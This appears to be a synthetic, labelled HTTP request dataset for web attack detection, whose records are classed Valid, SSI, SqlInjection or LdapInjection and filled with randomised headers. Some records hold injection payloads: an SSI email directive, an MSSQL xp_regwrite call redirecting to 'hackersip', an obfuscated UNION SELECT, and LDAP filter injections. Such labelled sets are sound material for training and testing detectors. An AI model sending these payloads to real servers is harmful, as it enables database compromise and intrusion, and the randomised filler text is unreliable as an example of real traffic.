Via: eodcdh/8.7 www.kIoa2.gif, 2.3 www.okDis.css
Transfer-Encoding: aylRf; nspySsy5=erh0i
Upgrade: nEsh/9.0, imfsa/9.1, dnt/4.8, 05t/6.8, pSsa8/7.7
Warning: 228 www.oikad9p.html "n7asOt" 
X-Forwarded-For: 216.94.170.227
X-Serial-Number: 92325368257
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27851
Start - Id: 39429
class: SSI
GET /27k3BX0astdin@lZ8/esJAI1B-H6-dzjc82/ab1HUBBPoOE7h/jtJsg/dlxPPt/girm.swf?UXY0Z0d5=xiH2p0&imtteht=eZt4En35aynfsOe9&mnfr=f%2B&qzoEjwnEnhdkenS=%3C%21--%23email+fromhost%3D%22www.usdutgp.com%22+tohost%3D%22mailbox.led0.com%22+message%3D%22scvia+nmosni+hoAl+eeaanl%22+fromaddress%3D%22hoo6.com%22+toaddress%3D%22sT6n.herb.com%22+subject%3D%22aac%22+sender%3D%22puzg.com%22+replyto%3D%22wtaDnr.com%22+cc%3D%22cbi%22+inreplyto%3D%22eiTa+hdsF+st8mt%22+id%3D%22nesnmail%22+--%3E&AI8insertQ=aQ14z&s4ngETgnsniRp=tm.ceZI&ahQ5Hdnol8r=3emE&3sPtl6Nhoe=%7Eei HTTP/1.0
Host: 8.141.160.115
Connection: toe3os
Accept: */*;q=0.3
Accept-Charset: koi8-r, x-mac-arabic;q=0.7, windows-1250, windows-1250;q=0.7
Accept-Encoding: compress, compress;q=0.2
Accept-Language: T9nig-S, t7xgtee-iPsA99dh;q=0.5, sjs-olcl;q=0.9, nenr-af
Cache-Control: no-store
Client-ip: 126.45.36.156
Cookie: knLlooep9ba4Aft=6e;dnxtaxnhinzmoPt=nsXy
Cookie2: $Version="308"
Date: Wed, 10 Dec 08 03:51:36 GMT
ETag: W/"qlXtqujxENs2lqE1RtE"
Expect: 100-continue
From: nitnd0Ry@sdsmmyeanh.ch
If-Modified-Since: Thu, 18 Feb 10 12:31:28 GMT
If-Unmodified-Since: Sun, 20 Nov 05 16:43:22 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9102
MIME-Version: 3.5
Pragma: ht=hOmppd
Proxy-Authorization: rashN riiam=cssstki
Authorization: rcve cmhta=4Waw
Range: -07524
Referer: http://www.nntl.com/jeesnL/mehUr/gsinriiw/TAtamwl/Rtir.js
TE: trailers,deflate,chunked
Trailer: Transfer-Encoding
User-Agent: beyonmbeR
UA-CPU: StrongARM
UA-Disp: 9324,2062,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 0340x7422
Via: 1.4 www.i6Bq.gif:29, 8.9 117.112.188.30, 8.2 www.morecd.jpeg
Transfer-Encoding: identity
Upgrade: Tnfr/9.0, twtet/7.7, sbse/4.5, iht/4.1, rei/1.4
Warning: 280 113.181.5.189:613 "neo5iip" "Wed, 20 Feb 08 05:16:28 CET"
X-Serial-Number: 7022355683967600
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39429
Start - Id: 23424
class: Valid
GET /rpB.UYz6B7O_b7vUbBl.jpeg?7oonmE7fE=7nph-&srrcpoon=ezt7&ariuBd=oA&kxevobject=evalhrtsl%29s&ym3gaueg08=+LSs&rut1c3ah1eos=%2Ffce+lu&c5po=707413&WecjAMrsiatbeh=69916011&obreh=ssbUHY&XaQvautoexec_6.W=ihi2juEr%3Coptunthv%28whh9 HTTP/1.1
Host: www.anitlemitf.gov
Connection: keep-alive
Accept: video/*;q=0.6, application/*, application/x-tar;q=0.9
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 220.6.217.121
Cookie: tzihna=r0U-;bnalncr65dke=n;aratcuoh=iA2.wv;8ltmonlEur=rincludeTr ;teeLAst=nd]?bbin(l0N]de connectkgroup by&l
Cookie2: $Version="4"
Date: Wed, 20 Jul 05 22:04:41 UTC
ETag: W/"8vLj49fQoe.ZINRZqca1"
Expect: lrsmoPb
From: i1ejual@Eudncoe.st
If-Modified-Since: Tue, 31 Jul 07 12:29:22 UTC
If-Unmodified-Since: Fri, 27 Nov 09 10:30:46 GMT
If-Match: *
If-None-Match: "t4eFIdZj1D04vhN"
If-Range: *
Max-Forwards: 00
MIME-Version: 6.6
Pragma: 3=nev
Proxy-Authorization: Basic dGFpaGNvOm82em0=
Authorization: Digest qop=auth-int
Range: -14180
Referer: /aeahpc.dll
TE: chunked;q=0.8
Trailer: Via
User-Agent: lzcets/5.5.6
UA-CPU: StrongARM
UA-Disp: 528,388,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 5603x6061
Via: FTP/6.4 www.iea5ttsm.png
Transfer-Encoding: compress
Upgrade: ewen/9.0, yzsq/2.6, dee/3.9
Warning: 236 157.67.24.128 "gsto" 
X-Forwarded-For: 255.53.232.99
X-Serial-Number: 15233843
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23424
Start - Id: 13471
class: Valid
GET /pntcciErxlfnfni/j7z-S/oBeNgQV9hMiDBgm-_P-B/SuSiutaeRtss/edl7iwdzrR7ctzeN.dll?qa43oZ3jTr7=oii9osswttle&-ivKkET=h%3FllmiN3 HTTP/1.0
Host: 91.200.192.251
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: max-age=2
Client-ip: 168.3.160.150
Cookie: hzhe=220497;nohneapw9inni=g_MSghuj8-R
Cookie2: $Version="69"
Date: Mon, 09 Jul 07 14:12:38 GMT
ETag: W/"GmUUIhFbJ@1bmc5s"
Expect: 100-continue
From: r5ya@wup7.fr
If-Modified-Since: Thu, 08 Jan 04 07:24:29 GMT
If-Unmodified-Since: Tue, 29 Aug 06 22:45:58 CET
If-Match: "08zYpyik6-4PLVTj6"
If-None-Match: *
If-Range: *
Max-Forwards: 9446
MIME-Version: 4.6
Pragma: lro7en=n8edl98o
Proxy-Authorization: rnioob osfeI7ak=Ist7ats0
Authorization: NTLM dExsY0VrbzNsaGlhYWFlZGJiOXJvdGVFaGxkYWRndXJpZW5vb3M5dHJsaGJlYW9z
Range: 76-,-780499,32157-
Referer: /stttp5/cshdy/eHena.mspx
TE: gzip;q=0.1,chunked;q=0.9
Trailer: TE
User-Agent: c20N0uvOI http://www.nnma9tt.org
UA-CPU: x86
UA-Disp: 710,2643,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 188x166
Via: FTP/3.8 145.168.17.113, 9.0 www.e7cN0ae.htm
Transfer-Encoding: agov
Upgrade: odo/1.8
Warning: 540 www.tequrah.html "6nhY" 
X-Forwarded-For: 37.38.29.200
X-Serial-Number: 648318819511788387
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13471
Start - Id: 18055
class: Valid
GET /nuga9qoso7OhaOejq/omnndltsRhmtleps/1zzLGX/amVQYpqh3-2bU/385.png?CeSV=8362061&ngawa1siui=24082&qdaiHhkn4lrirmC=O&sc7tairoh=%3Boel3ceY&ehW=334&lwpy=7&gd7sab=ySn5IEwJmqtQ&oerddrpe6=217&4emnmNeW=rXKX2&_nEUilib=9698589852&tu=aI+lltha%27easfTw HTTP/1.1
Host: www.rwc1osCe.net:80
Connection: fErthBxu
Accept: image/*;q=0.7, video/*, video/mpeg;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: mont90t-p;q=0.8, 3eune-2AgoaH, uI-trismE;q=0.4
Cache-Control: max-stale=15
Client-ip: 248.57.188.27
Cookie: VZEYyOsZ=6pjLXKwxR
Cookie2: $Version="013"
Date: Sun, 25 Apr 04 10:58:17 CET
ETag: "G.hNXzp6p44Yx7Thyh"
Expect: 100-continue
From: ubo9@noxriwRe.cz
If-Modified-Since: Thu, 25 Dec 08 11:19:12 UTC
If-Unmodified-Since: Sun, 24 Dec 06 01:59:21 UTC
If-Match: "6pEgER76o7_X4HJtH5t"
If-None-Match: *
If-Range: Sun, 13 Mar 05 22:22:28 CET
Max-Forwards: 3427
MIME-Version: 3.6
Pragma: qw='di'
Proxy-Authorization: Basic aW5wbnJzOjhzdW5hdA==
Authorization: Basic c3phaWJuem86c2NlaDRu
Range: -498682,294755-,-12868
Referer: http://www.I2Jrenn.be/nmpE/srta.jpg
TE: gzip
Trailer: If-None-Match
User-Agent: Mozilla/0.5 (X11; U; Linux i386 3.2; hi-td; rv:5.7.5) Gecko/23940288
UA-CPU: PowerPC
UA-Disp: 9424,5309,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 258x9628
Via: 5.2 www.o9iHchus.tiff, FTP/0.7 www.2etrgd.tiff
Transfer-Encoding: compress
Upgrade: tnau/0.7, Rsss/5.2, lts4/0.6
Warning: 163 www.s3rn.jpeg:50 "nRwkzetnteAhAoF" 
X-Forwarded-For: 169.12.78.179
X-Serial-Number: 60954
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18055
Start - Id: 28054
class: Valid
GET /1fWgZ6E2OD-2zP.29RMQ/wjbrernaebechNuTg/l9_u/vfVac/i5LeYNKLOSHJS4un.kp.html? HTTP/1.0
Host: 77.197.216.137:80
Connection: keep-alive
Accept: application/*;q=0.6, audio/basic;q=0.8, audio/*
Accept-Charset: big5, gb2312;q=0.6, x-mac-icelandic;q=0.1
Accept-Encoding: identity, identity
Accept-Language: *
Cache-Control: no-transform
Client-ip: 106.176.170.46
Cookie: xiop=r'ehthttp7bynnc;3Xiw2_8W@@n=ypxJVazgoAwf;k-0RwhereylFt78=7ie
Cookie2: $Version="63"
Date: Mon, 08 Jan 07 13:11:42 UTC
ETag: W/"8jQIu9B@UcxUE_Ne"
Expect: ansis
From: gu9cDaia@ar6it9.st
If-Modified-Since: Fri, 13 Feb 04 12:38:28 CET
If-Unmodified-Since: Sun, 01 May 05 16:15:58 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 28 May 04 19:55:07 UTC
Max-Forwards: 0122
MIME-Version: 3.4
Pragma: xstbfeea='Gu'
Proxy-Authorization: Basic dW5uYzp6b2NhRFRl
Authorization: Digest nonce
Range: -570
Referer: http://www.uromole3.net/Xpdwo/ah3ng1ha/oiaa0o5.fgf
TE: chunked;q=0.5,deflate;q=0.4,gzip;q=0.1
Trailer: Host
User-Agent: eltAe/0.6.2.4.6
UA-CPU: MIPS
UA-Disp: 352,634,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 2111x3686
Via: h6nia/2.6 240.94.82.193, HTTP/9.7 www.dwgn7ze9.tiff:78, a1ich9/6.6 www.spE6.jpeg
Transfer-Encoding: deflate
Upgrade: mt50n/6.1, frlaru/6.7
Warning: 759 www.rcgyueh.tiff:5 "wolidasoknadsaeahf" "Sun, 27 Jul 08 14:28:37 UTC"
X-Forwarded-For: 140.27.28.161
X-Serial-Number: 981815102258
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28054
Start - Id: 13246
class: Valid
GET /0r79neldnra/te/m1a0YHG4/oxrd4IauT/f2/crsrnote.html?cAtpue=878&8tZgenolanw=8026&mtso9sidso=pbtgteesnvM HTTP/1.1
Host: www.dyghnb.uk:13786
Connection: raehcne
Accept: */*
Accept-Charset: utf-8, iso-2022-kr, iso-10646-ucs-2, koi8;q=0.7
Accept-Encoding: 
Accept-Language: t5g-4;q=0.4
Cache-Control: no-cache
Client-ip: 112.204.111.204
Cookie: 8yeaitIsoHtnhs=mnsgnhldp>;oeiaiamerBu=ttepeybsny0t
Cookie2: $Version="9"
Date: Mon, 27 Dec 04 10:10:55 GMT
ETag: W/"is3KPRolYGtkC5GT"
Expect: 100-continue
From: berlo@UooOhol.cz
If-Modified-Since: Sat, 22 Oct 05 12:33:37 CET
If-Unmodified-Since: Thu, 09 Feb 06 24:59:25 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 2.8
Pragma: dcdn8th3='HhHxeho'
Proxy-Authorization: Ooasqs dwno=ntjiba
Authorization: NTLM aWR2dGludGZlZWkzaWl3bzdtdGhzYWhpT2FhcmI5ZHRib2l5dXRzdA==
Range: 16-5
Referer: /sif1E/wozeee.shtml
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/6.1 (X11; U; Unix 9.9; nk-fs; rv:3.9.0) Gecko/77801414
UA-CPU: MIPS
UA-Disp: 2503,069,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2344x540
Via: HTTP/3.6 115.167.156.91, HTTP/4.5 www.rifmdn.html, 0.0 65.93.133.204
Transfer-Encoding: compress
Upgrade: cdmd/1.3, tr0h/8.6, nesh/6.4, qnH/1.5, naAil/7.8
Warning: 198 157.148.141.227 "pngahiabduinT" 
X-Forwarded-For: 137.114.108.160
X-Serial-Number: 4810868204268
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13246
Start - Id: 30574
class: Valid
GET /xjsrSoysn/aoa/nhttpkskTzZ2s.jpg?rto=tdsajy&UwJy=jlocation9sm%7Eele&dU3esSblsjt=7897576181&htpass@98psyR=php2++&atiLCea=4o HTTP/1.0
Host: www.vbhmsLraE0.com
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: 2ialH4m-1rrnh;q=0.6, tmda-vEeN, e-aeophT, ie-Khhfa;q=0.7, 2-lhCmt
Cache-Control: no-transform
Client-ip: 61.132.5.63
Cookie: apir=Eaihsimh;lcN2KV=12548153;h8CfISZhChtpass=hsss
Cookie2: $Version="8"
Date: Mon, 02 May 05 05:52:24 GMT
ETag: "85sRP9tymf1-l02eG@9"
Expect: aina8
From: fulner@n7m8d5nmt.de
If-Modified-Since: Sat, 10 May 08 04:22:05 GMT
If-Unmodified-Since: Thu, 12 Oct 06 12:54:38 UTC
If-Match: *
If-None-Match: "ro.8O0t.r1sWivDq"
If-Range: Mon, 05 Dec 05 23:19:23 UTC
Max-Forwards: 685
MIME-Version: 9.2
Pragma: Ssdlx=iwSstres
Proxy-Authorization: dlri frtoat=ifoee5n
Authorization: ocpst nrGe=Sflu
Range: -6,40780-7
Referer: http://www.caiy.de/Eeiirs/sipaa/saou.php
TE: deflate;q=0.2
Trailer: Warning
User-Agent: Mozilla/0.4 (X11; U; Open BSD i386 2.9; ef-lA; rv:4.2.1) Gecko/26635090
UA-CPU: 68000
UA-Disp: 537,7746,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 0605x4751
Via: 2.5 100.180.96.213:234, 5.1 94.14.188.21, FTP/0.6 25.117.111.204
Transfer-Encoding: gzip
Upgrade: yseieo/2.3
Warning: 981 www.tChen.tiff "enpV8eeRsnbvnineberf" 
X-Forwarded-For: 215.132.242.147
X-Serial-Number: 389571955
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30574
Start - Id: 35067
class: SqlInjection
GET /tRo/hlTpqC_UJpnpd4eET0Zg/c@wKuibA248Vi/aein/aRtno0et8rs/hQLXRnNzjQoPQjUCZG/NJAr/egm.TIKzaUgBTBhM/gFmNoOfdFEVRSSej/meseut4ehoasst4vis.jpg?ebpumamt52=uh+ort2tOj+snaf+Hp&uR=rii&n8lOciae=+anmaX2ntaotrbin&_J_MMN4Um8=qeaeTAnhnscript&eyrgeesru=h-FqhjYSgPtq&nroAidaoillhnr=106&nnTT=exec++++xp_regwrite+++++%27HKEY_LOCAL_MACHINE%27%2C%27SOFTWARE%5CMicrosoft%5CMSSQLServer%5CClient%5CConnectTo%27%2C%27rSxm%27%2C%27REG_SZ%27%2C%27DBMSSOCN%2Chackersip%2C80%27&317eesTnaMFnk=boot.ini1u%5Be%28E9folibr&nnslh=selectnztIem&hn9ehvak=lsnp&catbWEf8Ce_Ahavingf=eOmvZF3r9&eis3onegset7T=98865363&ipsijec=%28na%5D HTTP/1.0
Host: 185.133.251.153
Connection: bNIfuMi
Accept: video/mpeg;q=0.0
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: max-stale=01
Date: Fri, 11 Nov 05 21:57:03 GMT
ETag: "@Q2pOBJcB38UINBAlX"
Expect: 100-continue
If-Unmodified-Since: Sun, 11 Mar 07 02:35:49 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5689
Pragma: no-cache
Proxy-Authorization: NTLM aWQ5MGNBYXNhcmdFZW1zdGlpdDJpN0EyZGxybGxpbmlTZQ==
Authorization: ooeda eestum=adtm
Referer: http://www.lgeorseu.be/eRainh.png
User-Agent: Mozilla/1.7 (Windows; U; Win98 5.0; 5n-vr; rv:1.5.1) Gecko/66799139
UA-OS: WinNT
Via: 3.8 19.239.68.151
X-Serial-Number: 074180308
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35067
Start - Id: 37655
class: LdapInjection
POST /8rMpndeawoxomhusu/jUtmpvbscript/glyhrpeaulsealcaij5/sCFDKXbu2Fbac/IWzhomebVOs6A_A4nC/eVt/edX.LNBhW7YR9b/soehYnhlssctaea/gtWtPY.fGUaeVgYb/njtsSst2elvee/epMlXTDrOotgZ.html? HTTP/1.1
Content-Length: 181
Content-Language: se
Content-Encoding: gzip
Content-Location: /8eLytmq/r7kie.css
Content-MD5: cmFoamlydm1vbXY1NmV0SA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 31 Mar 04 06:33:46 GMT
Last-Modified: Sat, 23 Oct 04 22:44:05 UTC
Host: 223.63.171.22
Connection: 5xrea
Accept: */*;q=0.9
Accept-Charset: iso-8859-6, iso-8859-1, utf-8
Accept-Encoding: compress, compress;q=0.1, deflate;q=0.5
Accept-Language: *
Cache-Control: no-cache
Client-ip: 88.224.210.21
Cookie: mdodolaak=6815;vsteh=leso;nehvrNday1d=e$og;aa2lyoRhaete=afe noad
Cookie2: $Version="878"
Date: Wed, 05 Jul 06 19:04:03 GMT
ETag: "I_BLdcsmr42mGnXLVLke"
Expect: Raatca4=tncrtx
From: p9ot@shsomno.org
If-Modified-Since: Tue, 29 Nov 05 17:14:32 CET
If-Unmodified-Since: Mon, 27 Aug 07 20:13:38 GMT
If-Match: "NBdhm5sq3xstri0-WP0_"
If-None-Match: "r7MY7qmMKQfbKI0kE"
If-Range: Wed, 28 May 08 17:18:05 UTC
Max-Forwards: 987
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: Digest username="oowuyy"
Authorization: Digest qop=elac
Range: 7-75,773-,28-851
Referer: http://6a7a6oe.it/Q0Na/uyircah.rar
TE: deflate;q=0.0,chunked
Trailer: Accept
User-Agent: Mozilla/9.7 (X11; U; Open BSD i586 1.4; ti-ri; rv:9.1.8) Gecko/70972808
UA-CPU: PowerPC
UA-Disp: 8272,2255,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 940x1719
Via: 9.7 www.whe4mkr4.jpeg, 0.6 www.Eplelef.shtml
Transfer-Encoding: wte6ed
Upgrade: eithhe/7.7, qnnlt/0.5, 2teem/8.4, rcndti/9.6
Warning: 026 155.240.111.33 "facqeennibgrcecdveu" "Wed, 19 Jul 06 04:22:04 GMT"
X-Forwarded-For: 62.169.63.215
X-Serial-Number: 60981
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eEOtTeort=hpp)(&(objectClass  =smLe*)&sr9bswterl=rt&qTlewy=Ejvtulink'tm ;from&ieo6hosadtaownd=scripti&unoQqcvlO=e &xeei8ah=6357014&lhe=hhdcyeuT4a&agocnx=hugANebwieen

End - Id: 37655
Start - Id: 34601
class: Valid
PUT /eobzf3iGnyz4-oW_@w@u/oS9Gb@arQDP/gH7uVbp/udssnopcEwd1/BimgfBUZx.tiff? HTTP/1.1
Content-Length: 74
Content-Language: avewRNt,5Deeg
Content-Encoding: identity
Content-Location: /rofhEcb/6sqL/tsykeeim/rhs3htda/r36aeoe.cgi
Content-MD5: ZUJhZWl4MWlobjlzZWVhdw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 05 Feb 04 03:09:08 CET
Last-Modified: Fri, 30 Apr 10 06:23:31 CET
Host: www.tease.gov:80
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: iso-8859-8-i, x-mac-icelandic, iso-8859-3, x-mac-roman
Accept-Encoding: *
Accept-Language: mSnasan-te;q=0.5, sh-hosfgm3;q=0.1, qron-eansEmae;q=0.0, hdNsn-t, mdot1b-onbcsoaC
Cache-Control: min-fresh=36150
Client-ip: 60.53.181.132
Cookie: 0ne4=966
Cookie2: $Version="658"
Date: Tue, 22 Apr 08 10:00:20 CET
ETag: W/"vPwpXccS6LBbiMltIVZB"
Expect: esccraO6=rlwoOyee;kiigloo=603t
From: 9rrsW@dinSeD2.ch
If-Modified-Since: Mon, 15 Jan 07 16:17:46 UTC
If-Unmodified-Since: Tue, 22 Aug 06 07:09:53 CET
If-Match: *
If-None-Match: "Ix6a0Xdrfl82Q-C@O"
If-Range: *
Max-Forwards: 59
MIME-Version: 4.8
Pragma: uoniws=ED
Proxy-Authorization: amH2c rnecro=ka4eNao
Authorization: NTLM Z25yYWhvMHJoRWZlVG9vZWFzZ0k4b2lBc2h0Ykxubmlu
Range: -64
Referer: http://c8r9lE8R.org/thtsM/nndtetea/biomnsoo/RZMyiyEa.cgi
TE: trailers,gzip,gzip
Trailer: Accept
User-Agent: woitnisoN (2@N_wdoFA; yhDzDAOV)
UA-CPU: PowerPC
UA-Disp: 769,2419,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 6005x647
Via: HTTP/5.2 156.106.63.58, hlar/2.2 198.91.2.51, 1.9 www.sefe.css
Transfer-Encoding: identity
Upgrade: fco/1.0, aeshit/3.2, 5nnce/2.9
Warning: 945 www.eeodke.htm "hasrmstcsdtwtkpyg" "Tue, 18 Dec 07 06:07:29 UTC"
X-Forwarded-For: 24.202.233.40
X-Serial-Number: 1977553705
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

-SjHSS1z=inetcat&meDrnt=sfo0eAloeirSeh&su=22017691&itm9=rouis&de=t2o1OBWrv

End - Id: 34601
Start - Id: 36931
class: LdapInjection
PUT /eSy_ELY/a9rsTnan5rtrSRL6qe3/hh-.css? HTTP/1.1
Content-Length: 88
Content-Language: 3e,lce6oE,Imo
Content-Encoding: compress
Content-Location: /rtenri/epReTAo/m7eeni.asp
Content-MD5: a2huczY2ZmZlcjlubWh0dA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 19 Apr 05 04:41:19 UTC
Last-Modified: Mon, 06 Sep 04 09:27:29 GMT
Host: 63.205.19.197
Connection: keep-alive
Accept: text/html;q=0.0, audio/*;q=0.7
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=2
Client-ip: 162.232.160.26
Cookie: ny=ebrNvdatO;deleteXtpucbgsoundTWELj=tHdmexecthpnntsi|6eehtpass;Ta=daetmoedt9ioukqdio;4hlq=dFp0MzMSmTv@;RB@XJfrom=onrcps;JBeSQA@pRS=594399
Cookie2: $Version="3"
Date: Tue, 28 Dec 04 23:13:38 UTC
ETag: "RZdC@lsq9GUwPpK44b"
Expect: 100-continue
From: nareu4te@pple4n.it
If-Modified-Since: Tue, 30 Jan 07 24:04:59 UTC
If-Unmodified-Since: Wed, 28 Jan 04 18:59:20 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 26 Feb 07 13:33:24 UTC
Max-Forwards: 55
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Basic NG9lYWFkZTM6b25zZXhzdGM=
Authorization: Basic czhSb3Y5czp0YXJBNDZj
Range: -312
Referer: http://www.wiredss2.gov/xwbsaien.jsp
TE: deflate;q=0.5,gzip;q=0.1
Trailer: Accept
User-Agent: gv-zRJVAOT http://www.sirnmj.org
UA-CPU: StrongARM
UA-Disp: 0609,6015,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 015x0585
Via: 8.7 133.129.254.83, 8.7 225.162.81.219, FTP/0.8 www.Tai5ed0.htm
Transfer-Encoding: anaeip; aruqea=n4he0rf9
Upgrade: ejsf/1.7, lxAe/6.8, 3Tuete/5.0
Warning: 200 169.156.209.196:92 "0oiSeraRieyyto" "Thu, 26 Aug 04 15:57:50 UTC"
X-Forwarded-For: 189.182.231.41
----: --------------------------------------
~~~~~: ~~~~~~~~~~

soeiwua=)   (   |   ( cn=*o    'brien* )(mail   =*o   'brien*    )

End - Id: 36931
Start - Id: 10984
class: Valid
GET /a7pXs/oW/esnsnssi5n3gm3am/a@l2wxqSJZLR/eId/h.zSujeLCHEd7fTR9Of/k3a/oa/CoemsAdo/ifB4b@0YlM_7kTL/Sdelete.DLVna.css?1t3EhrautrnRe=29&ngeotelCt2sose=jalebcwhereff+umt4t&fBscript0-=411&hs=5043&2crf1eedb4x=lsShtqr&tcda7a0H=n HTTP/1.1
Host: www.5ln4rumay.de
Connection: rfaOt8J
Accept: audio/basic;q=0.0, image/*;q=0.9
Accept-Charset: iso-8859-1;q=0.8, iso-8859-6
Accept-Encoding: identity, gzip, deflate, deflate;q=0.4, identity;q=0.8
Accept-Language: *
Cache-Control: min-fresh=35
Client-ip: 174.60.171.41
Cookie: phyhesm=entqsUren;fne5l8=na
Cookie2: $Version="75"
Date: Tue, 26 May 09 07:30:28 UTC
ETag: "l3Um3FuC_D3@Yj0mc"
Expect: ftiia=ete1aao;donifevV
From: e5rsien@oece.be
If-Modified-Since: Wed, 01 Sep 04 01:35:49 GMT
If-Unmodified-Since: Sun, 28 Nov 04 23:08:59 CET
If-Match: *
If-None-Match: "a6K5TQnRUlDp5dTezlgU"
If-Range: *
Max-Forwards: 4348
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: NTLM aHQzbnNvZTNyamVjZWRhYXRzRnRhZ2hscDRwNXEzaDZrYWFuaml1MXI=
Authorization: NTLM Z2F6Y2dudGFpcm9Nc3lpb3lkZWFUYnBuaWUzb2lkbnNzb2V2YWFsYQ==
Range: 415535-51
Referer: http://6etyduru.net/ffD81eoH.conf
TE: trailers
Trailer: From
User-Agent: Mozilla/5.5 (Windows; U; Win98 4.8; ms-Mb; rv:3.4.5) Gecko/37985473
UA-CPU: Sparc
UA-Disp: 618,722,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 124x705
Via: ioiay/8.0 www.tnpn9.js, 0.4 www.einut.gif
Transfer-Encoding: compress
Upgrade: iel/9.0, oheP2O/3.1, Iic66t/8.1
Warning: 502 www.a6ETf3aa.jpeg "ihitc" "Mon, 05 Nov 07 14:03:56 UTC"
X-Forwarded-For: 40.189.230.161
X-Serial-Number: 109708230731
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10984
Start - Id: 41928
class: SqlInjection
GET /rnaFnoxnarsipsEE6o7t/rqk49igUpSya/AJPmeFeltOvar-n/ceoubooht3tendrdrTpj/yRQ@npeqLNfrRjXQ.png?leu0e92pzm6ta=jb&StdT=6&tpds=%3B++EXEC%28%27UNI%27%2B%27ON%27%2B%27++%27%2B%27SEL%27%2B%27ECT+++++%27iti4iTo%27%2C2%2C63%2C%27S0n%27%2C9++++FROM+++++u0Otrsp%29&l7ieeblaf3t=rXr8ue9a&wdTc8a1=encngohRsmfaEmgrn&hutCsw3=626381&7t0ooe=nfouoyloiftm8no&teee43=geasneoeMeitoaets&IEstelnetWU-IOx8=1&vsttyetrrnftd=37427710&euerssuba=2&lcbqdONasyi1s=4o%2BQ0&Mpittudt=9683727&seeesrd=no7 HTTP/1.0
Host: 69.46.173.10
Connection: sEeLe1l
Accept: */*;q=0.7
Accept-Charset: macintosh, hz-gb-2312, windows-1257;q=0.0, cp-932;q=0.8, iso-8859-7;q=0.8
Accept-Encoding: *;q=0.2
Accept-Language: de-oe6h, slf-eqdeOlda;q=0.2, Ajet-toiljDe;q=0.2
Cache-Control: no-transform
Client-ip: 167.205.9.192
Cookie: iiabsn1pft5a=v ;aac=window.openi Ot7oltdocumentmochar\si
Cookie2: $Version="26"
Date: Sat, 17 Nov 07 14:41:07 UTC
ETag: "o4V4NB.J9gXaYf8twh"
Expect: ywWtykim
From: uedR4wh@iydiiAh.st
If-Modified-Since: Thu, 09 Oct 08 13:01:50 CET
If-Unmodified-Since: Sat, 22 Jan 05 18:09:20 UTC
If-Match: "gezxUR8lLgf2Vj4_"
If-None-Match: "86NMV@.8B3FpIztt1"
If-Range: Mon, 25 Feb 08 08:50:19 UTC
Max-Forwards: 772
MIME-Version: 8.6
Pragma: Tertaen='tE'
Proxy-Authorization: NTLM aWpBVDRyVWhiaUFpZW5lZkltd3ROSHd1cjFpYXp0cmV5MGxtQWFwY2Jnb3I=
Authorization: Digest qop=auth
Range: -0
Referer: http://tghcha.biz/Onehorem/yRtosA.gif
TE: trailers,chunked,chunked
Trailer: If-Range
User-Agent: Mozilla/3.3 (X11; U; Linux i386 8.6; cn-sr; rv:9.8.6) Gecko/73564860
UA-CPU: 68000
UA-Disp: 4298,556,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 1720x8487
Via: FTP/5.7 223.170.21.181, 9.8 15.19.178.124, 3.9 15.184.144.16
Transfer-Encoding: gzip
Upgrade: gs3/3.5, sao/7.3, xcz/3.3
